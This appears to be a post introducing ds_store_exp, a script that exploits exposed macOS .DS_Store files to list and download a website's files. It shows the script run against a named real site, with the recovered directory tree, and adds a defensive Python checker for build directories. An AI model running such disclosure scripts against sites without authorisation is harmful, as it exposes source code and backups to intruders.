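.DS_Store is a data file that Finder on macOS uses to store how files and folders are displayed; there is one in each folder.

If developers or designers upload .DS_Store files to a production environment, the file and directory structure may be leaked, in particular backup files and source code files.

ds_store_exp is a .DS_Store file disclosure exploit script. It parses the .DS_Store file and recursively downloads the files to the local machine: https://github.com/lijiejie/ds_store_exp

The DS_Store parser is based on ds_store 1.1.0.

An example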

python ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store
 
hd.zj.qq.com/
└── themes
    └── galaxyw
        ├── app
        │   └── css
        │       └── style.min.css
        ├── cityData.min.js
        ├── images
        │   └── img
        │       ├── bghd.png
        │       ├── bgitemactivity.png
        │       ├── bgmaskerpop.png
        │       ├── btnbm.png
        │       ├── btnloginqq.png
        │       ├── btnloginwx.png
        │       ├── icoaddpic.png
        │       ├── icoaddress.png
        │       ├── icobm.png
        │       ├── icodurationtime.png
        │       ├── icopopclose.png
        │       ├── icorighttopdelete.png
        │       ├── pageloginhd.png
        │       ├── picmasker.png
        │       └── ticketselected.png
        └── member
            ├── assets
            │   ├── css
            │   │   ├── acereset.css
            │   │   └── antd.css
            │   └── lib
            │       ├── cityData.min.js
            │       └── ueditor
            │           ├── index.html
            │           ├── lang
            │           │   └── zhcn
            │           │       ├── images
            │           │       │   ├── copy.png
            │           │       │   ├── localimage.png
            │           │       │   ├── music.png
            │           │       │   └── upload.png
            │           │       └── zhcn.js
            │           ├── php
            │           │   ├── action_crawler.php
            │           │   ├── action_list.php
            │           │   ├── action_upload.php
            │           │   ├── config.json
            │           │   ├── controller.php
            │           │   └── Uploader.class.php
            │           ├── ueditor.all.js
            │           ├── ueditor.all.min.js
            │           ├── ueditor.config.js
            │           ├── ueditor.parse.js
            │           └── ueditor.parse.min.js
            └── static
                ├── css
                │   └── page.css
                ├── img
                │   ├── bgtabletitle.png
                │   ├── bgtabsay.png
                │   ├── icoblackdisabled.png
                │   ├── icoblackenabled.png
                │   ├── icocoorptionperson.png
                │   ├── icomissperson.png
                │   ├── icomrperson.png
                │   ├── icowhitedisabled.png
                │   └── icowhiteenabled.png
                └── scripts
                    ├── js
                    └── lib
                        └── jquery.min.js
 
21 directories, 48 files
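
To check a build directory or web root for this leak before deployment, the following added example (not part of ds_store_exp or the original post) walks a directory, finds .DS_Store files and lists the entry names each one would disclose. It uses a heuristic scan for the record layout (name length, UTF-16BE name, 4-character structure ID, 4-character data type) rather than a full B-tree parse; the function names and the SAMPLE bytes are constructed for illustration.

```python
import os
import struct

# Data type codes that follow the 4-byte structure ID in a .DS_Store record.
TYPES = {b"long", b"shor", b"bool", b"blob", b"type", b"ustr", b"comp", b"dutc"}

def leaked_names(data: bytes) -> list:
    """Heuristically list the entry names stored in .DS_Store bytes.

    Record layout: uint32 name length (UTF-16 units), UTF-16BE name,
    4-char structure ID, 4-char data type. This scans for that pattern
    instead of walking the B-tree, so it is an audit aid, not a full parser.
    """
    if data[4:8] != b"Bud1":              # magic missing: not a .DS_Store file
        return []
    names = set()
    for i in range(len(data) - 12):
        (n,) = struct.unpack_from(">I", data, i)
        end = i + 4 + 2 * n               # offset just past the name
        if not 1 <= n <= 255 or end + 8 > len(data):
            continue
        sid, typ = data[end:end + 4], data[end + 4:end + 8]
        if typ not in TYPES or not sid.isalnum():
            continue
        name = data[i + 4:end].decode("utf-16-be", errors="replace")
        if name.isprintable() and "\ufffd" not in name:
            names.add(name)
    return sorted(names)

def audit_tree(root: str) -> dict:
    """Map every .DS_Store under root to the names it would disclose."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".DS_Store" in files:
            path = os.path.join(dirpath, ".DS_Store")
            with open(path, "rb") as fh:
                report[os.path.relpath(path, root)] = leaked_names(fh.read())
    return report

def _record(name: str, sid: bytes = b"Iloc") -> bytes:
    """Build one constructed record carrying a 16-byte blob payload."""
    return (struct.pack(">I", len(name)) + name.encode("utf-16-be")
            + sid + b"blob" + struct.pack(">I", 16) + bytes(16))

# Constructed sample, not a real capture: header magic, padding, three records.
SAMPLE = (b"\x00\x00\x00\x01Bud1" + bytes(24) + _record("backup.zip")
          + _record("config.php.bak") + _record("backup.zip", b"bwsp"))

if __name__ == "__main__":
    print(leaked_names(SAMPLE))
```

Any non-empty result from audit_tree on a deployment directory means the .DS_Store files should be removed from the build and requests for them blocked at the web server.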
